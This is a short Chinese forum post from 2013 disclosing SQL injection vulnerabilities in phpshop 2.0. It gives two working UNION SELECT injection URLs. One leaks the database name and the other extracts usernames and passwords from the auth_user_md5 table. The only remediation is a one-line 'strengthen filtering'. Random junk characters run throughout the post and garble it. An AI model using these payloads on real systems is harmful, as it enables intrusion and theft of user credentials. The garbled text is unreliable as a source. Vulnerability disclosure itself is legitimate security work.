标题 : phpshop 2.0 SQL Injection Vulnerability- \$ m6 j6 l% z- ?# t
& R7 q5 H# M+ c% w作者 : By onestree% n! Y' S5 l1 v1 f3 i
下载地址 : http://code.google.com/p/phpshop/downloads/list
2 q1 h9 o4 T j: W* z1 Y6 R! C测试地址: windows 7 / ubuntu
. _& m; Q4 Q" g
" A' Y6 c* _$ e+ z
5 [" k. g1 w. P1 f- o5 `" Q; o" zSQLi p0c:
% z3 j$ W! ~) v0 e7 ~5 i9 Z
. j7 F5 {, U( S9 \, s; e================== ? L7 ^- l% E9 n6 W0 S6 d5 h: J
% Q- B7 p: r K7 r1 hhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'6 ~# ]. L0 F. h' Z, d! U
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --1 H& A% I# x1 M( s1 Y7 ?1 S0 k. c
# b0 a3 ?( J0 whttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--/ a* j# e2 O$ A
" H. c2 p4 ^; m ~修复:4 j) a8 y4 p v8 z" O4 a
加强过滤; R8 W4 h% p# i% a
/ ]) Z% i' e6 m2 U/ Z: j& a* y
; Z. ^" M/ X8 ]$ s, I |
发表于 2013-1-18 18:24:10
收藏
支持
反对